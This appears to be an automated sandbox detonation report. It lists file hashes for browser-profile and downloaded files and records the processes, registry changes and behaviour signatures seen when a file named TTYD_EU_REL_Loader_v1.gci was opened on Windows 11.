C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\kvgg58fx.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | 8f87c7d6bb3e751e3edd7790af8a5b80 |
| SHA1 | ea437ecbc8de3d3f27595dafee05c777684dbdf9 |
| SHA256 | 39262169af35252c546912066433d073cd02cb53398e2d4b85bb82b470d560f8 |
| SHA512 | df971fba21d97d4a58b4d3058b9d96d31bbe23e295027a6d6caae1d44099b5367e86f0a2b8a598cd59cea22770e4099f6735f8a448e11c6601223265b01d4b92 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\kvgg58fx.default-release\cache2\entries\E00350F3957C939CD6DFFE4516C46DE6C1A79DD1
| MD5 | 7e8ae9dbbd714ee4145b023e1e7c6a55 |
| SHA1 | d0403841f7434b6bc5b84589517e7cac8de32618 |
| SHA256 | 88f0935b5ad6f7918454d5242bd5b81581f7d1a2c4df4c54b11f3d738c5b345e |
| SHA512 | f791f992c331baf7c51a50fa4fb1fe0bdfa78e14a470651d7b050c3d10e0e0a0a31445f7a7b33853b2de04071d9f64bb49f6d07c8007cae74bfb7d976eb97252 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\kvgg58fx.default-release\cache2\doomed\25795
| MD5 | 7d15790520389b213f15f573bdb2de75 |
| SHA1 | 856890070e0bf3636507672225fdffdcc5749cea |
| SHA256 | fdecdf64237513652acf0ef23d84f133a01fd9d477182befad84c1a2f49f38f8 |
| SHA512 | 91d5da40f4b1c2b37c87f0b9ce0f4caf1895b90ff43959ae3a0b27e8abc21c436d1da8b7c3849246db1a87607ae1abdd6e7dfd7f60b314825926a57a89aca459 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\kvgg58fx.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | 3a23c8cd2b3e3ffde7b441d8720bf316 |
| SHA1 | db1b599656fe2cd9c4968b6787951485daeacee8 |
| SHA256 | b8c38985dd4114133dd0d4bf8a2695cbf0ab4c128c7c415ccf08da9a27f90e4d |
| SHA512 | 7e8a35e87ada4b52f2984dbc83a0b2d8eb99c28bcd08e9c7c5a899a30324dfd5bc7e125b771eb2bd92daf5397eb542b331635b6f32145882a521d80ed77d358b |
C:\Users\Admin\Downloads\supervirus\assets\data\ridge\ridge.exe
| MD5 | 5ed4728caa339c2a7479102f0c04c087 |
| SHA1 | 20cd453fcac9d9960b0076715d985a55784a6b53 |
| SHA256 | 7160db2b7a6680480e64f0845512d203a575f807831faf9a652aaef0988f876c |
| SHA512 | a521eac0d54fbfb9726fad3fafcd7779d455ca46e065a3eafc1a7883961b061550bab8e93ce576904b6c6b2d25cf129ff3d2437ed26a6033ac7c0b4c628dc865 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\kvgg58fx.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | 4d398703860cd0e9e329ad3eb26e176a |
| SHA1 | 210f7164732d216eaf512dcaa6f18edd7f996261 |
| SHA256 | a0aafc13e7c64d9d21218b1c0ffcdc5c73aa92b4f94532008dfa4caa4f405602 |
| SHA512 | 5c4cc96e706a19859fef51a63e7d590f04ea0db6c85bf32f4df6d6753dd2721547456612c8c2e6148a73e0abbe7010ae6906d0521aec48ec2ac588b67c01559d |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\kvgg58fx.default-release\cache2\doomed\14979
| MD5 | d1455be072a91c6399f7c0faa16781e6 |
| SHA1 | e36c41775cacf93772926945f83783c8f198d69c |
| SHA256 | 42e9f2b701a9f6be65c2c75a118898c09a2713e21cd3cb3c015a4d2ca022eee2 |
| SHA512 | b6951b67fc2cdb98d460ea4168d5380e6127e00b912d45be6df27e195814cd703a2a7e801084a8ca4c3bfc5afab53da9ba957c06c22488bc637762ee1e3c1be3 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\kvgg58fx.default-release\prefs.js
| MD5 | de228ced4830b114e4975dcc2009d12e |
| SHA1 | 9c5ed637434260ece4bfa18209508cf79c9c705e |
| SHA256 | 5feebb4669fe726be15da3bb6536f3faea140ce6246847bd3eed783a19a4ed56 |
| SHA512 | d913d418df3650c0e98cba7901406cdbac17a4aa7d8697e8b4919284366fcd827709cb7a4b9e9fe5b3c56f972673abc5a9dd5a5ab6a956989d12262e7b3c13c8 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\kvgg58fx.default-release\cache2\entries\5CD1EBDF6B57F13C7E783CE5E6D8E9C44014FE1A
| MD5 | 0c44023b2f63a8d429df578f5e8e3519 |
| SHA1 | dba78cf8750de8df4992b76aaf5658b1f3c9dc25 |
| SHA256 | 8e4907638b2ce90fa8c59ce7740f431a1202b4ff9ce1be814bcbc91ab2b7fc76 |
| SHA512 | 4c87620f5b4ad3331ec49d46783afda98c79fa2ad0d04b7dfcef207b5815f056c5828050e291521eb3f02c7f5cd3a6e221f726d38110228ad744ad673d00927b |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\kvgg58fx.default-release\prefs.js
| MD5 | 18ed20d5c9cd1af1a5e9b3d416f30f36 |
| SHA1 | 18d22223d8b3a4c31cc5bbe7d366fb988f04cd1b |
| SHA256 | 9f16ac7b15b9f856595ea702544e141e63fd3b1d6ca76c95caaaadb76d5f920d |
| SHA512 | e9ca5e5fb260a4efc5618f9d3d7a01b3c21cc1d80d0e587acc41990dbae8cae991d505df3c53a8ddeb39dc2c99dcc297cb51bb8b41125333240e0196e5479313 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\kvgg58fx.default-release\prefs-1.js
| MD5 | 861c8bf781c5393014d9fbafa4a23c94 |
| SHA1 | c68012f59a47b28406436289ec0e620804223aa6 |
| SHA256 | e77db40aad68734ad236b705146d1d34f55c29d777d958411afcbff4e17cd4be |
| SHA512 | 21d2ce2210997f753c4e3f343c708ade7a698160820994e9ceb083737831da0a124447219e34d1c2bd3b540fba96664033ad3ea43b22c0316da78d73f80320da |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\kvgg58fx.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
| MD5 | 546a12bebccb32dac5cca3214be7914f |
| SHA1 | 744e3cd77189a70871739b4d7320f90ec91bd05f |
| SHA256 | cc767a1ebc6dc79d1626c8c71daa8a6cc8d6c98aee0744ed78feb2f78a5322e9 |
| SHA512 | d06aa4b064be53d7af12e9723a88adf9753ab31153149e63200cd08595f91a17a3b5a475265deaf64a04be1c124dc3126536fc390518071c4df766f9d636b687 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\kvgg58fx.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | 7eaab5c8d6c05ed8df295b158695470d |
| SHA1 | 78fa59b34bb512feb22deee7de7c4a4c1025b13b |
| SHA256 | f74e8e55d3148c80bef17b2640c337480a09bcb6e1a2ddc68ff03e4a12b87efb |
| SHA512 | 29b82dc545786f7a5ff0119a972694bdaaa9e2bbefc0bd1d2aae62f941ec3b897cd8f514d5a87b7db7893f1eec68e9a4caf64533f067e397a4b56f5a39fb18d3 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\kvgg58fx.default-release\cache2\doomed\29289
| MD5 | ecc3c150790ec53d43d592bd14342f3c |
| SHA1 | e85dc2c81bec02fb320a6a58a8b5ef05e150e243 |
| SHA256 | 8f42012f13a8d4472fde789561cd01a317064a37aa9d43128304e484d5d83be4 |
| SHA512 | 36477b64d8e8c663e3bda18a259a5b4c4cc6fa86f6ce4fed3abdfc50c127d7ef878187d287ee631dfa79c0545469beaafd2f8e4e75e6a67ec498e8b58caf3642 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\kvgg58fx.default-release\cache2\entries\042C660BA4291440397E6C82873F32C9B8F4549B
| MD5 | e6538fe457ccb6b129adb92c948152e5 |
| SHA1 | 458d7cea585c6dfd0696741b31ec75a2b04298d3 |
| SHA256 | 25ba6d368e8c1b56b094ce2142d6ac9444d6f9b676294d9e97017e17d572f95d |
| SHA512 | 95207793c6c039965f9773eac32d532dd5154f3bf86d8f7be9dcb4bd987f8ce4ad30eee9c2970e0940e8e357620e43658aaa0bca340bfd8975a9827122be8255 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\kvgg58fx.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | 53e53663adc357e7e7e6d00fe4e189b5 |
| SHA1 | 363abbf6a3f696283c1692449e1734d7d885ef9e |
| SHA256 | 2ed3639dbc1110fad099513e00352b2e1f7f9bb32cc5c1f49a3a61f5e4561856 |
| SHA512 | 33f43ea5842b9d66c93176f92d7bb79052bf855958f39485da7af1a536ee9ac2f24396d8454b9f83ea37a882b039be8593070468437743b8da088e7b59b1c4c5 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms
| MD5 | 6365ad38da2d5697a2267a2a509514b1 |
| SHA1 | 3564342b1312e16ceea42b5066098c03a910dcd9 |
| SHA256 | fc86500788a85c821e24db83d31b0729930c3122f3c287249ec7342f70e7ae9b |
| SHA512 | 645b30e60dcd2032abb5af7ee3d6e0279a785d276e6988b63fe7adcd947fa90e03be115b2f1c08184efe13241fdfddc8cf4f4b706c66599cfea5acd5b1fb13ce |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms
| MD5 | 60c604bebb951063315ca9ec7a75bffe |
| SHA1 | 04404743c8c52784e5d1e7d0597f7a2ee7e5525d |
| SHA256 | 15e9ca8ebb373a65369b28f20d18e46f8e8d05df1d4ce0c300f3f7a7c36a439c |
| SHA512 | 4830d43e0dff0afb6d7aac4f73aa96ff5f01b2ab4e98c3363f77b085ec3b304be33d3a146cf575f4390db3f8dcd3e1c08cf0ad6d30c378997414100f07477977 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\kvgg58fx.default-release\cache2\doomed\25343
| MD5 | fa1db6abc054e10810d1dbc13499ceac |
| SHA1 | 18fdf26433eb528deda7ecfbeb6aa701734cf183 |
| SHA256 | f7dbe5d476081831e0f097eb247e50224abdebc916e4d9d2f2c0e96cb37e93e9 |
| SHA512 | 718737124206c2324482408b1ad9e3d21d42069fd5d8fb16b6870a1b54ffd3aee0aae45d26013c41afafb53aa17a6e9400f93a173eddbd85d07920f0a2feed7c |
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-27 20:20
Reported
2024-06-27 20:23
Platform
win11-20240611-en
Max time kernel
146s
Max time network
150s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\TTYD_EU_REL_Loader_v1.gci
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding